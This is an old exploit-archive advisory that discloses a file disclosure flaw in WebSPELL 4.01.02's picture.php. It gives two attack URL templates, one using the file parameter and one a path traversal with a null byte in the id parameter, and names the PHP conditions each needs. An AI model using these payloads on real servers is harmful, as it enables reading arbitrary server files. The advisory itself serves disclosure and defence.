WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability
# Published : 2007-04-05
# Author : Trex
# Previous Title : XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit
# Next Title : phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability

# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
#   ___     ___
#  /      /          ___________________________
# /   / _/         /                           
# __/     /__/    /  GIVE ME A CARROT OR I WILL 
#      O O/               BLOW UP YOUR HOUSE     /
#   ___/ ^ ___      / ___________________________/
#      ___/        /_/
#      _/ _
#   __//   \__
#  /___/_/___
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (= on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar

# www.Syue.com [2007-04-05]